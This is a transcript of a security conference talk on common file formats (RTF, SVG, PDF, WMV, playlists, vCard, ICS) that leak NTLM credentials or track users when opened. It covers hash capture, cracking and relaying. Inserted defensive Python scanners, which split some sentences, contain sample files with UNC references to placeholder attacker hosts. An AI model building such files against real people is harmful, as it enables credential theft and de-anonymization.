Right next to me are Daniel Crowley and Damon Smith. They are both security engineers for NCC Group, and they told me they could not bring a unicorn today. Very sorry. Yeah, they're gonna tell us about some special properties in regular files, so exciting, I think. Do your best.

Thank you. I think you're wrong. Hello. Hey, great microphone volume. Love it. So, as previously stated, we're here to tell you about bugged files, so let's start out with a quick introduction.

Hi. My name is Damon Smith. As mentioned, I am a security engineer working with NCC Group. Traditionally my focus has been application security, including web applications, embedded devices and mobile applications. More recently I've started doing some research on file formats with this lovely gentleman right here.

I'm also a security engineer within NCC Group, and I'm mostly working with web applications, crypto, some embedded stuff and file formats. So let's move on.

Just to clarify a little bit, this talk is focused in a particular way. We're gonna be talking about files that trigger outbound traffic when they're opened. We didn't want to look at executable formats, because it's not really interesting for me to tell you that an executable can make outbound traffic when you open it; there are a lot of other nasty things that can do, of course. We didn't really try to limit it to complex formats or simple formats or anything like that; we were taking a look at what we believe are very common formats. We also didn't want to use any exploits. We didn't want to find bugs in file parsers. We wanted to use only the features of the parsers and the formats that they're parsing. And we also want to discuss the implications of all this.

So why should you listen to us talk at you for the next 50 minutes?
We think that the research that we've done is very important for a variety of different reasons. The first and most obvious reason is the privacy implications. We're going to go over some of these use cases in a little bit more detail, but for now imagine documents that can phone home every time you interact with them. This can be used in DRM, data loss prevention and, of course, de-anonymizing users. In addition to the privacy aspect, there are also some serious security concerns with these types of file formats, which we'll go into a little bit later. Finally, and I think most importantly, all of the things that we're going to show you today are not bugs. They're not a mistake that a programmer made. They're not off-by-one errors. They're not memory corruption. These are things that were written into the RFC. They are in the file format specification and they are working as intended. This is not something that's going to be fixed on Patch Tuesday. These bugs are going to live for years.

So we're gonna start with a quick demonstration with three different formats: RTF, SVG and WMV. A quick prayer to the demo gods, please.

So here I've got Metasploit open, just for the SMB capture. Can everyone see that okay? Yes, excellent. So we've got this providing the standard challenge and dumping to a file, and over here we have our victim machine with several of our bugged documents. This is running Windows 8.1, fully patched. Yes. So we're gonna open up this RTF file now. Something interesting happens here when we open this. You can see in a moment it's going to pop up a little dialog that says "This document contains one or more links to other files. Do you want to update this document with the data from the linked files?" What's really interesting about this is that it has already sent the hashes along. So, worst warning message ever, right?
Yeah, and I think probably they're looking to prevent bugs with, you know, the document attacking some parser. But even if we say no, it doesn't matter, because the hashes have already been sent. The cat's out of the bag.

So, there's nothing up my sleeve here. I'm gonna clear this, and we'll open up this SVG file. By default on Windows, SVG files are parsed by Internet Explorer. There's a bunch of fun things that you can do with Internet Explorer regarding this, and if we have time we'll discuss that a little bit. But here you see an image format, of all things, can cause this interaction to occur. Our example SVG file is blank, but you could easily have whatever arbitrary image you want show up so that people don't get suspicious. Absolutely.

So what I'm gonna do now: we've kind of set this up to knock it out of the park. It's not always gonna be this easy, but in this case, since it was not quite so easy to set up a demo for NTLM relaying, which would be mostly what I think would be useful, we're gonna go ahead and just crack the hashes that we've received. And here we see that we've got a throwaway account with the password of "throwaway". So like I said, we set this one up for ourselves. But now, just because somebody opened up a document that is, you know, not malformed, it's a well-formed example of a format that's using its features, everything is working as normal. This is normal. So this is by design, people. This is how it is supposed to work.
So it's just a lot of things that, when put together, don't work the way we really want them to. The last thing that I want to show you here is a Windows Media Video file. This is a slightly modified version of a video that comes with Windows by default. As it turns out, you can actually cause interactions to occur from a video. Again, this is part of the format, and we will be discussing this later on, but we've just had it launch a browser window. So that's lovely.

So that concludes the demonstration, and we're gonna start talking about all the different formats that we've got things on, and sort of the implications and whatnot. Continuing on from the demo. I probably should have hit "play from current slide", and I'll "play from start".

So there's been some prior work in this area. Damon, do you want me to take this one? So there's been some prior work in this area. This is not really a new technique. We're not pioneering this whole "hey, let's send SMB and get NTLM hashes" thing. This is something that's been known for a while. There's a tool out there called ZackAttack which implements many of the ones that you see here. There's also a tool in Metasploit that's been around since 2008. But this problem still exists, and we kind of wanted to see how widespread it is.
So it's already known that you can do this with the Office format, Office Open XML, which is not confusing at all when compared to the OpenOffice XML format, which is from a different... Anyway, the Microsoft XML-based document formats. There are ways to do this with PLS playlists and shortcut files. I can read it to you, but I think you guys can read. Some other silly things: in Internet Explorer, HTML elements can reference SMB paths and cause this interaction to happen. So for instance, in Windows Media Player, you saw that we were able to pop open a browser window using a Windows Media Video file. We can load that up to a URL which then has an image on an SMB resource and triggers that same NTLM interaction. The same thing can be done in HTML emails in Outlook. So that's a little bit of the prior art in the area.

What did our research focus on? We focused on three families of formats: document formats, media formats and groupware formats, which are meeting and scheduling formats. We wanted to look at file formats that your traditional corporate employee on your traditional corporate build is likely to open. For instance PDF files: that's something that your average corporate employee is used to receiving in their email on a daily basis and will blindly double-click without any thought. So that defines which file formats we specifically looked at.

One of the most obvious ones is PDF. This was immediately something that we wanted to take a look at.
It's a very complex format. We knew there was going to be something in there somewhere, and PDF files are incredibly common. So we spent a little time on this. You can embed remote images in PDFs, as it turns out. This will just automatically go and fetch the image when opened. As a note, these only work on Adobe Reader. Most of the PDF readers out there have a very limited subset of the PDF functionality available. So Firefox, Chrome, Preview from macOS, all of these support a limited subset of PDF functionality, and these techniques don't work on them. Fortunately or unfortunately, depending on who you are.

So the remote image functionality basically just grabs an image from a remote endpoint and displays it within the PDF. And of course you have to reach out to a third party to get that, and if you're creating the PDF document, you're choosing who you connect to. There's also JavaScript functionality in PDFs, which is, you know, what could go wrong. There is a method that allows you to open a video player within a PDF, which is insane. I can't imagine why you would ever want to do that. I can imagine why you might want to, but I might need substances first. But regardless, maybe I'm just not thinking of PDF in the way that other people are thinking of PDF. Regardless, you can open up a video from a third-party location. And there's also a method that allows you to just pop open a URL in the browser, the default browser that is, which is getURL. You might be looking at this warning message and wondering what's going on here, and I'll leave it to Damon to explain the nitty-gritty details behind that.

So as we mentioned, it is possible to open SMB paths within the JavaScript parsing engine of PDF readers. Unfortunately, it does issue a warning message.
However, when we were investigating this particular bug, we found an interesting aspect to this warning message. Many of you are probably already familiar with UNC paths, which are something like \\hostname\sharename\file. There is an additional form of UNC that you may not be familiar with, called long-form UNC, that goes \\?\hostname\sharename\file. I don't really know why that exists, but as you can see from this warning message, we actually confused the PDF reader into thinking that the question mark was the host name. So we can cause you to connect to www.sketchy-attacker-website.com, but your PDF reader will instead say "This document is trying to connect to ?. Do you want to allow this?" I'm not sure if that's more or less sketchy than saying www.attacker.com, but it's a neat nuance of this particular format. So have fun with it. We thought it was funny enough to include regardless of whether it's actually useful to anybody.

So the next format that we have, and one that you've already seen a demonstration of, is the Rich Text Format. The very cool thing about the demo that you saw earlier and the proof of concept is that it works in both WordPad and Microsoft Office. So it doesn't matter if your victim has the Microsoft Office suite installed or not: if they double-click this RTF file, you will get their NTLM credentials. Additionally, as you saw during the demonstration, it does put up a little warning message about linked files and "do you want to display them?"
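The warning-dialog confusion the speakers describe comes down to how a parser pulls the host out of a UNC path. The following is an added example, not code from the talk or from any PDF reader: it shows a naive host extraction that reports "?" for the long-form spelling next to one that strips the extended-length prefix first, so that a consent prompt names the host the OS will actually contact. It assumes a reader displays whatever its UNC parser returns; the attacker host name is a placeholder.

```python
r"""Which host does a UNC path name? Added example, not code from the talk or
from any PDF reader. It assumes a reader's consent prompt shows whatever its
UNC parser returns as the host; the attacker host name is a placeholder."""

import re
from typing import Optional

# Extended-length prefixes. \\?\UNC\host\share\file is the form documented
# for Windows; the talk describes the spelling \\?\host\share\file, and both
# are stripped here before the host is read.
_PREFIXES = ("\\\\?\\UNC\\", "\\\\?\\")
_DRIVE = re.compile(r"^[A-Za-z]:(\\|$)")


def naive_unc_host(path: str) -> str:
    r"""A parser that only knows \\host\share\file: drop the leading
    separators and take the first component. For \\?\host\share\file this
    returns "?", which is what the warning dialog in the talk displayed."""
    rest = path.replace("/", "\\").lstrip("\\")
    return rest.split("\\", 1)[0]


def unc_host(path: str) -> Optional[str]:
    """Return the host the path will contact, or None if it is local."""
    p = path.replace("/", "\\")
    for prefix in _PREFIXES:
        if p[: len(prefix)].upper() == prefix.upper():
            p = p[len(prefix):]
            break
    else:
        if not p.startswith("\\\\"):
            return None          # C:\file or a relative path: no network traffic
        p = p[2:]
    if _DRIVE.match(p):
        return None              # \\?\C:\file is a local drive, not a share
    host = p.split("\\", 1)[0]
    return host or None


if __name__ == "__main__":
    bugged = "\\\\?\\www.attacker.example\\share\\image.png"
    print("naive:", naive_unc_host(bugged))   # ?
    print("real: ", unc_host(bugged))         # www.attacker.example
```

The practical rule for anyone writing such a prompt: derive the displayed host from the same normalisation the file-open call will perform, never from a string split done for display only.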
But it only displays that warning message after it has already sent your credentials to the attacker, making it possibly the most useful... sorry, useless warning message ever.

So the other thing that we've already demonstrated is SVG, which stands for Scalable Vector Graphics. It is an image file format, but it is for displaying vector images instead of the traditional image formats, which are used for bitmap images. Very quickly, the difference between bitmap and vector graphics: a bitmap, roughly, is a data structure that defines "this pixel has this color and this transparency" and all that, and then it describes the next pixel and the next pixel and the next pixel until it has built the entire image. With vector graphics, it describes the image in terms of vector functions. So it says "draw this line from here to here with this color". So it's two different ways of encoding an image file.

An SVG, as we mentioned during the live demonstration, by default on Windows is parsed with Internet Explorer. The fun thing about SVG is the way that it's structured. It is a markup language very similar to HTML, and it actually implements a subset of the HTML language as part of the SVG format. One of the things that you're allowed to specify in an SVG file is remote XML stylesheets. So I can say "load this cascading style sheet from this remote location", and if you're using Internet Explorer, which by default on Windows you are, it will accept file paths. So you can say, for this image file, I want you to download the stylesheet from this remote SMB share, which of course, as you saw during the demonstration, leads to disclosure of NTLM credentials. Additionally, they can run JavaScript. Did you know your images could have JavaScript in them? No, because that's insane.

So we took a look at various playlist formats. As stated earlier in the talk, PLS is prior art.
That was not our discovery, but we found out that both M3U, which is closely tied to the MP3 format, and ASX, which is more of a Windows Media-specific playlist format, are also susceptible to this sort of tomfoolery. Basically all of these playlist formats support remote paths, for reasons of internet radio and that sort of thing. So obviously there's the ability to make remote references.

Interestingly, and I think it's probably the right time to bring this up, Windows is where UNC paths are handled in general. The same API call that is used to open a file from the local file system is the API used to open UNC paths. At some point during the function call it just sees "oh, this is actually a UNC path, let me handle this remotely". So you don't necessarily need to write SMB or UNC handling into your parser. You just have to use the standard way of interacting with the file system in your parser, and Windows will make this happen for you. So most of these playlist formats are simple; in the case of M3U at least, it's a list of paths to be played. So in all of these formats, instead of specifying a file path, you can specify a UNC path, and it will do the sort of interaction that you saw previously. Or, if you just want to see when somebody opens up your playlist, you can embed a remote reference at the start.

So the next format that we looked at is actually a family of formats, the ASF family, which you are probably more familiar with as Windows Media Video and Windows Media Audio. This one was actually really interesting to us, because who thought that your audio and video files could contain remote tracking code? So this was actually a kind of surprising result.
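Seen from the defender's side, the SVG stylesheet reference and the playlist entries described above are plain strings in the file, which is what makes them detectable. The following is an added example, not the speakers' tooling: a small scanner that pulls the outbound references out of SVG (xml-stylesheet, href/src attributes, inline script), M3U and ASX files and classifies each as a UNC share (NTLM credentials will be offered there) or a URL (a beacon). The sample files are constructed; 192.0.2.10, tracker.example and radio.example are placeholders.

```python
"""Find the outbound references that make an SVG, M3U or ASX file "bugged".
Added example for this transcript, not the speakers' tooling. The sample
files are constructed; 192.0.2.10 and tracker.example are placeholders."""

import re
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

Finding = Tuple[str, str, str, str]   # (format, location, kind, reference)

_UNC = re.compile(r"^(\\\\|//)[^\\/]+[\\/]")        # \\host\share... or //host/share...
_URL = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)


def classify(ref: str) -> Optional[str]:
    """'smb/unc' for paths Windows opens over SMB, 'url' for anything with a
    scheme, None for local or relative references."""
    ref = ref.strip()
    if _UNC.match(ref) or ref.lower().startswith("file:"):
        return "smb/unc"
    if _URL.match(ref):
        return "url"
    return None


def scan_m3u(data: str) -> List[Finding]:
    hits: List[Finding] = []
    for n, line in enumerate(data.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue                        # blank, comment or #EXT directive
        kind = classify(line)
        if kind:
            hits.append(("m3u", f"line {n}", kind, line.strip()))
    return hits


def _scan_xml(fmt: str, data: str) -> List[Finding]:
    hits: List[Finding] = []
    # ElementTree drops processing instructions, so pick the xml-stylesheet
    # href (the SVG vector used in the demo) out of the raw text first.
    for m in re.finditer(r"<\?xml-stylesheet\b[^>]*?\bhref=[\"']([^\"']+)[\"']", data):
        kind = classify(m.group(1))
        if kind:
            hits.append((fmt, "xml-stylesheet", kind, m.group(1)))
    for el in ET.fromstring(data).iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()      # strip the namespace
        if tag == "script":
            hits.append((fmt, tag, "script", (el.text or "").strip()))
        for attr, val in el.attrib.items():
            if attr.rsplit("}", 1)[-1].lower() in ("href", "src"):
                kind = classify(val)
                if kind:
                    hits.append((fmt, tag, kind, val))
    return hits


def scan_svg(data: str) -> List[Finding]:
    return _scan_xml("svg", data)


def scan_asx(data: str) -> List[Finding]:
    return _scan_xml("asx", data)       # <ref href="..."/> entries


# Constructed samples, one of each format.
SVG_SAMPLE = (
    '<?xml-stylesheet type="text/css" href="\\\\192.0.2.10\\share\\style.css"?>\n'
    '<svg xmlns="http://www.w3.org/2000/svg"'
    ' xmlns:xlink="http://www.w3.org/1999/xlink" width="1" height="1">\n'
    '  <image xlink:href="http://tracker.example/pixel.png" width="1" height="1"/>\n'
    '  <script>/* JavaScript in an image */</script>\n'
    "</svg>\n"
)
M3U_SAMPLE = (
    "#EXTM3U\n"
    "#EXTINF:1,beacon\n"
    "\\\\192.0.2.10\\share\\silence.mp3\n"
    "Music/track01.mp3\n"
    "http://radio.example/stream\n"
)
ASX_SAMPLE = (
    '<asx version="3.0">\n'
    '  <entry><ref href="\\\\192.0.2.10\\share\\intro.wma"/></entry>\n'
    '  <entry><ref href="http://tracker.example/song.wma"/></entry>\n'
    "</asx>\n"
)

if __name__ == "__main__":
    for hit in scan_svg(SVG_SAMPLE) + scan_m3u(M3U_SAMPLE) + scan_asx(ASX_SAMPLE):
        print(hit)
```

Classifying rather than blocking matters here: a playlist full of http:// radio streams is normal, while a playlist entry or stylesheet pointing at \\host\share almost never is, so the "smb/unc" findings are the ones worth alerting on.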
It comes courtesy of a friend of ours, Derek Hinch (black days), so shout out to him for introducing us to this technique. The way that this is accomplished is by embedding script metadata into a WMV or WMA file. You have the ability to embed scripts in these video and audio files such that when playback reaches a specified point, for instance five seconds in, it will execute the contents of this script command. This has traditionally been used to accomplish things like closed captioning, so you can have it display text on the screen when you reach the 30-second mark that corresponds to whatever the people on screen are saying at 30 seconds. That's more or less how closed captioning is implemented in this format. However, when you're looking at these script commands, in addition to doing something like "display text on screen", you also have this really cool one called URLANDEXIT, which means "open this specified URL in the default browser and halt playback". As you saw during the demonstration, this equates to: you are watching a video file, whatever video file. I'm not gonna speculate on what kind of video it is.
That's up to you. But anyway, you get to the 30-second mark, that's when the video starts to become really interesting, and bam, it opens up your browser window to www.nsa.gov/you've-been-tracked-lol. So that's what we're running into with these file formats. Yes, your video files can contain embedded script commands, and yes, those script commands can de-anonymize you, which is really unfortunate.

Additionally, a technique that we've postulated but have not yet proven is abusing the built-in DRM functionality. To briefly describe how DRM works in this family of formats: it's actually quite simple. It encrypts the entire video file, and then in the header information it specifies "if you want to watch this video file, you need to go to this URL and download the decryption key". That's more or less, at a high level, how DRM is implemented in these formats. It's fairly obvious that this can be used to track people. Unfortunately, this is something that we haven't yet demonstrated, because the DRM is so horrible to work with that we can't even get it working legitimately, much less circumvented. But look for that in the future. That's probably a technique that either has been used by your adversaries or will be in the future.

Additionally, one quick note: subtitles. They can include arbitrary HTML, not just bold or italics or underline like you might expect in a subtitle, but things like "img src=", so you can actually have subtitles in a video file that reference a remote image.
I don't know why that's the case, but that can also be used for tracking.

So the next format that we took a look at was MP3, and this one was obviously very interesting to us. Obviously there are a number of entities that are looking to crack down on piracy, so this was definitely an interesting one for us. The thing is that MP3 is actually a rather simple format in comparison to some other formats. MP3 by itself doesn't actually include any metadata whatsoever. This might seem confusing to you, because obviously MP3s that you might legitimately acquire have metadata describing the artist, the album and all that sort of thing. As it turns out, that's actually a separate format called ID3, which is just sort of a de facto part of MP3 now. Since MP3 is basically just a series of fixed-length blocks that say "here's how you're going to interpret this block of audio data coming up", then the block of audio data, repeated until the end of the file, ID3 was the obvious choice for going after this.

One of the things that we learned while doing this is that people don't always follow the RFCs when creating something that works with whatever technology you're defining. So ID3, the way it's structured, is a series of frames. So you have "here's the type of frame, here's the length, and then here's the frame data". There were two that were interesting to us: the LINK frame and the APIC frame. The LINK frame basically says "the frame you're looking for is in another castle", so go off and fetch this frame from this other file here. So I was like, yes, that's what I want. And then there's also the APIC frame, which is "attached picture". So you can say "this picture is not here.
It's in another place, go fetch it." So the thing is, no player that we looked at, and we looked at a lot of them, supports either of these types of frames. However, when we found out that you could do the scripting content in WMA files, as it turns out you can just rename a WMA file to .mp3, and as long as it opens with Windows Media Player, it will be like "oh, this is named wrong here, I'll open this as a WMA file. Oh, you want me to open a URL? Yeah, sure." So it's kind of cheating, but if it's stupid and it works, it ain't stupid. So there you are.

You might be wondering why there's a picture of a fish on this slide. There's some hilarity in the ID3 RFC. As it turns out, as a part of the APIC frame you specify what type of picture is attached. Number 13 is "a bright coloured fish", for whatever reason. Another fun fact: Primus has its own enumerated genre number in ID3. So, go Primus, I guess.

So we also took a look at the torrent format. Again, lots of entities are looking to de-anonymize pirates, and torrenting for whatever reason has some ties with that. This one is actually pretty easy, because you can have as many trackers as you want listed within a torrent, and when you open up the torrent, it's going to check all of those trackers until it gets a certain number that are actually active. So it's just going to visit URL after URL after URL, and so you can get it to reach out to however many different places you want. And since people tend to open up torrents and then just kind of leave them going for a while, the fact that it takes a long time to step through doesn't really make that big of a difference. The other thing that we saw that wasn't really implemented in any torrent client that we tried was URL seeds. This was pitched as an alternative to the classic BitTorrent protocol seed. You can have HTTP seeds.
You can have FTP seeds, which, if you have nothing in the swarm, if you have no active seeds, is a way that you can get the data initially, right? But we didn't find anything that supports this, so we weren't able to do FTP or any other funky URI handler. We were hoping for file:, because again we could get the NTLM win, but that's not something we got. However, I can do something like initiate a whole bunch of HTTP requests from wherever you're opening the file. So if I want to try to exploit, let's say, every CSRF flaw in home routers for the past five, ten years using a torrent file, I can do that. So that's interesting.

So the next one that we got a win on is the vCard format. This is used for exchanging virtual business cards between users of, for example, Outlook, which is part of the Microsoft Office suite. So the vCard format is used for exchanging business cards, like I mentioned. It has a lot of the obvious fields, such as what is the person's name, what is the person's email address, what is their phone number, all that stuff that you would expect. It also has some things that you might not expect, at least not at first. One of the attributes that it supports that we found very useful is the free/busy URL. Let me briefly describe what this is used for. Let's say that I've exchanged my virtual business card with Dan, and Dan would like to set up a meeting with me. When Dan opens up his calendar client and says "I want to schedule a meeting with Damon Smith", his calendaring agent will automatically go to my free/busy URL and say, okay, is Damon Smith busy at three o'clock? Is Damon Smith busy at four o'clock? Etc.
That is the proper functionality of the free/busy URL. Obviously that's able to track people over HTTP. What is perhaps not so obvious, and I still don't understand why it's implemented this way: you can include a UNC path as a free/busy URL. So I'm telling Dan's calendaring agent, if you want to find out when I'm free, you need to connect to this remote SMB share and download it from there. Which is completely insane, and I can't imagine why this is allowed in the parser, but it's definitely allowed, and it definitely allows you to steal NTLM credentials. Yeah, I mean, you could explain it away like, oh well, it's okay, you have local file paths that specify when somebody else is free or busy. Yeah, it doesn't make any sense. But it does take a little bit of social engineering or pretexting to get this to work. Not only do you have to get the victim to accept the virtual card and add it to their address book, you then have to convince them to attempt to schedule a meeting with you. So it's perhaps not the easiest to exploit, but if you've got some skills in social engineering, which I'm sure some in the crowd do, you could probably pull it off.

So the next one we looked at, we included for posterity and for hilarity, because ICS is kind of a fun read if you take a look at the RFC. Well, I guess, if you like reading RFCs. So, a quick anecdote: if you're ever writing a file parser, there are actually three critical steps that you have to follow. Step one is to read the entire RFC for whatever file format you're designing for. Step two is to take the RFC and light it on fire. And step three is to do whatever the hell you want and completely ignore the RFC. Truth. Real talk.

So the way in which this manifests for ICS: ICS files are actually very easy to read. If you just pop one open, you start immediately understanding how the file is structured. It's one of those great file formats that you can just kind of
understand intuitively by looking at it, which is great. One of the things is VALARM, which defines the alarm that is associated with a given meeting request or calendar event. One interesting thing about this is that it is actually defined by the meeting request sender, not the receiver. And you can have multiple alarms. So one thing that you can do which is really hilarious is to set up a meeting with somebody in two days and set off an alarm to pop up a pop-up box and play a sound every minute until then. Depending on your calendar user agent, it might automatically accept the meeting invite as well, which is hilarious. Denial-of-sleep attack. Yeah.

So I'm reading this RFC. It's late. I've probably had something to drink. I've almost certainly had something to drink. And I'm looking at this, and I'm looking through the different types of alarms. There's four. There's two perfectly reasonable ones. There's one that's like "display": pop up a pop-up box. "Alarm": make some sound, whatever, I don't care. "Audio", which is like, oh, go to this URL, download this sound and play that. And I'm like, oh, that could be nice. And then the fourth one, I'm just like, it's a spit-take moment. It's called "procedure": just run this command with these parameters. What?

So here is the heartbreaking thing, or the really relieving thing, depending on who you are. It doesn't work in any calendar user agent that we looked at. Doesn't work in any of them.
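Both vCard and iCalendar use the same "NAME;PARAM=value:value" content-line syntax with line folding, so one small parser covers the FBURL case and the VALARM cases above. The following is an added example, not the speakers' code: it unfolds the lines, then flags an FBURL that names a UNC share, a VALARM with ACTION:PROCEDURE, an AUDIO alarm whose ATTACH is remote, and an alarm whose REPEAT count is large enough to be the "every minute for two days" nuisance. The sample card and calendar are constructed; 192.0.2.10 and tracker.example are placeholders.

```python
"""Audit vCard / iCalendar content lines for the properties discussed in the
talk. Added example, not the speakers' code; samples are constructed and
192.0.2.10 / tracker.example are placeholders."""

from typing import Dict, Iterator, List, Tuple

Line = Tuple[str, Dict[str, str], str]        # (NAME, {PARAM: value}, value)


def unfold(text: str) -> List[str]:
    """Undo line folding: a line beginning with SPACE or TAB continues the
    previous line (RFC 5545 section 3.1 / RFC 6350 section 3.2)."""
    out: List[str] = []
    for raw in text.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and out:
            out[-1] += raw[1:]
        elif raw:
            out.append(raw)
    return out


def parse_line(line: str) -> Line:
    """'NAME;P1=V1;P2=V2:value' -> ('NAME', {'P1': 'V1', 'P2': 'V2'}, 'value').
    Quoted parameter values containing ':' or ';' are not handled here."""
    head, _, value = line.partition(":")
    name, *params = head.split(";")
    pdict: Dict[str, str] = {}
    for p in params:
        k, _, v = p.partition("=")
        pdict[k.upper()] = v
    return name.upper(), pdict, value


def content_lines(text: str) -> Iterator[Line]:
    return (parse_line(l) for l in unfold(text))


def is_unc(value: str) -> bool:
    v = value.strip().strip('"').lower()
    return v.startswith(("\\\\", "//", "file:"))


def is_remote(value: str) -> bool:
    return is_unc(value) or "://" in value


def audit_vcard(text: str) -> List[Tuple[str, str]]:
    """FBURL is meant to be an HTTP URL; a UNC path makes the calendar client
    authenticate to that share when someone tries to schedule a meeting."""
    findings = []
    for name, _, value in content_lines(text):
        if name == "FBURL" and is_unc(value):
            findings.append(("FBURL points at an SMB/UNC path", value))
    return findings


def audit_ics(text: str, repeat_limit: int = 10) -> List[Tuple[str, str]]:
    """Inspect every VALARM; the sender of the invite defines them, not you."""
    findings = []
    alarm: Dict[str, str] = {}
    in_alarm = False
    for name, _, value in content_lines(text):
        if name == "BEGIN" and value.upper() == "VALARM":
            in_alarm, alarm = True, {}
        elif name == "END" and value.upper() == "VALARM":
            in_alarm = False
            action = alarm.get("ACTION", "").upper()
            attach = alarm.get("ATTACH", "")
            if action == "PROCEDURE":
                findings.append(("VALARM runs a procedure", attach))
            elif action == "AUDIO" and is_remote(attach):
                findings.append(("VALARM fetches a remote sound", attach))
            rep = alarm.get("REPEAT", "0")
            if rep.isdigit() and int(rep) >= repeat_limit:
                findings.append((f"VALARM repeats {rep} times", alarm.get("TRIGGER", "")))
        elif in_alarm:
            alarm[name] = value
    return findings


# Constructed samples.
VCARD_SAMPLE = (
    "BEGIN:VCARD\r\nVERSION:4.0\r\nFN:Damon Smith\r\n"
    "FBURL:\\\\192.0.2.10\\share\\damon.ifb\r\n"
    "END:VCARD\r\n"
)
ICS_SAMPLE = (
    "BEGIN:VCALENDAR\r\nVERSION:2.0\r\nBEGIN:VEVENT\r\n"
    "SUMMARY:Sync\r\nDTSTART:20160101T150000Z\r\n"
    "BEGIN:VALARM\r\nACTION:AUDIO\r\nTRIGGER:-PT5M\r\nREPEAT:60\r\nDURATION:PT1M\r\n"
    "ATTACH;FMTTYPE=audio/basic:http://tracker.example/\r\n ping.au\r\n"   # folded line
    "END:VALARM\r\n"
    "BEGIN:VALARM\r\nACTION:PROCEDURE\r\n"
    "ATTACH;FMTTYPE=application/binary:\\\\192.0.2.10\\share\\run.exe\r\n"
    "END:VALARM\r\nEND:VEVENT\r\nEND:VCALENDAR\r\n"
)

if __name__ == "__main__":
    for finding in audit_vcard(VCARD_SAMPLE) + audit_ics(ICS_SAMPLE):
        print(finding)
```

The unfolding step is not cosmetic: a client that scans the raw text for "ATTACH:" would miss the folded URL, while the parser that actually interprets the file would not.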
I'm just imagining somebody implementing it and looking at the RFC, like, no, no. That's the "light the RFC on fire" moment right there. So not even the successor, because this is the iCalendar format, not even the successor to iCalendar supports this. I mean, it does, but you have to define the meeting yourself. I got a little bit excited when I created something that used a procedure alarm, because it pops up this box, like "do you want to accept this", and the options, instead of being yes or no, are like "no" and "no, don't even import this at all". So I'm like, yes, they'll click through. No, or no harder. Yeah. No, or more no. So, unfortunately, this is not a usable technique, but it's just a funny thing, and I can't believe that this was an idea that somebody had and wrote it down and shared it, because I just don't even understand. But there you have it.

All right, let's start talking about potential use, or misuse. So we've discussed the formats that make this possible. Now let's discuss a little bit about why anyone would care. Why would anyone want to abuse this functionality? The first and perhaps the most obvious implication that we could think of is digital rights management, one of our favorite words at Chaos Camp. Am I right? We all love DRM. Imagine a dystopian future DRM that, every time a particular file is opened, calls home to a remote server to track that that file has been opened. This goes beyond traditional DRM, whose sole purpose is to dissuade you from opening a file when you don't have the right to open it. This goes beyond that and goes into identifying the people that are attempting to open these files. This is a lot more dangerous than the DRM that we have today, and this is something that can be done today in today's file parsers.
This is something we haven't seen done, but it's something that I think we should all be a little bit afraid of. To be fair, we haven't looked very hard to see if this is being done. Fear, uncertainty and doubt on all of you.

There's also sort of a data loss prevention angle to this, and there are two sides to it. One is: I don't want somebody to steal my sensitive documents, so I'm going to put, like, "salaries 2016.pdf" up on this file share of secret documents, and nobody should ever open this, but if it does get opened, then alert me at this URL. The other side is, let's say that you're a fascist government and you want to keep people from whistleblowing. You could use these techniques, in theory, to prevent people from being able to do that, at least easily, without being identified. You can imagine that somebody exfiltrates a document that is of value to be put in the public knowledge, and the document calls home from every place it's opened from: your computer, your work computer, your home computer, a lawyer's office, a friend's home. And then everybody disappears. Right? This is, I think, the thing that scares me most about all of this: this potential misuse.

Another that is fairly obvious is de-anonymization. So if you've ever used the Tor Browser Bundle, raise your hand. Just kidding. Don't do that. Don't tell anyone that. Bad idea, don't do it. So if you've ever used the Tor Browser Bundle and you've ever downloaded a file via the browser, it pops up this great little warning dialog that says: note, if you open this file, it could easily de-anonymize you and tell bad people what your real IP address is. Don't do it. This research is why that warning dialog exists.
They know that this stuff is possible and they are trying to warn you. To be clear, this warning existed before our research, but this technique, this sort of idea, is why that warning exists.

One potential application of this: for instance, a government agency. You may not have administrative control over that jihadist wiki, and you may not be able to track its users, but let's say you upload a PDF file called "How to make a bomb in three easy steps", and it has a remote image URL embedded in it, so that for everyone that opens that PDF file, you now know who they are and that they want to make a bomb in three easy steps.

So we discussed this, or at least we showed this and focused on this fairly extensively, just because if you can take over somebody's machine, if you can get somebody's credentials, then there's a lot more that you can do. I think a pretty important part of this is that you can actually affect the security of the machine: you can get credentials and pass them along or crack them. Just in case there's somebody in the audience who's not quite familiar with NTLM relaying attacks, I'm gonna go over it very briefly.

So, normal NTLM authentication, at least version 2: you as a client say to a server, "hey, I'd like to authenticate and get access to whatever it is you've got there." The server says, "okay, here's this number. I need you to mix this in cryptographically with your password hash and send that back." The client does so, returns that value to the server, which then decides based on "does this match up with the information
they have? Should this person be allowed access? Now the problem here is that while the client is authenticated, the server is not, so there's nothing in this negotiation that ties this data to a particular server except the nonce, that random number. So if, as an attacker, you can get a client to attempt to authenticate to you, you can just pass that information along until you get to the point where you gain access, and you tell the client, "No, sorry, that didn't work. Would you like to try again?" And then you pass it to somewhere else.

So in our demo we had a password that was easily cracked. It was, like, two seconds, if that. This is an alternative to that, where you pass the credentials along without having to crack them. So anything that the person attempting to authenticate to you, knowingly or not, is trying to gain access to, whatever they can gain access to with their credentials, you can now gain access to because of the way that NTLM works.

It's worth noting that as of the most recent, actually it's been quite a while back that they've patched this: it is no longer possible to relay authentication back to the same machine that initiated it. Hilariously, before, I think, Windows 2000 or maybe XP, you could have someone attempt to authenticate with you, pass the exact same authentication information back to their machine, and authenticate to them. So that's been fixed for a long time now.

So we discussed briefly the fact that with these documents, when you're initiating outbound requests, it's coming from a privileged network position.
You're behind whatever firewall might be in place, and you can exploit all sorts of interesting things that, you know, maybe assume that if you're on the local network, you're totally fine.

So this slide probably could be renamed. CSRF assumes some sort of authenticated session that you're riding on. In some cases that is absolutely the case. As you saw in previous demonstrations, with several of these techniques, these formats, the parsers will actually just pop open the default browser and work from there. If you can do that, then you can ride on authenticated sessions that might exist with the default browser. But even without that, you're still coming from a probably privileged network position when somebody's opening a document.

So we've told you what the problem is, we've told you how it can be abused. Let's talk a little bit about what we thought about how to fix it. Possible mitigations: because there really isn't a silver bullet, there isn't a perfect solution to this, but we're gonna go over what we thought of and why it's not necessarily a great solution.

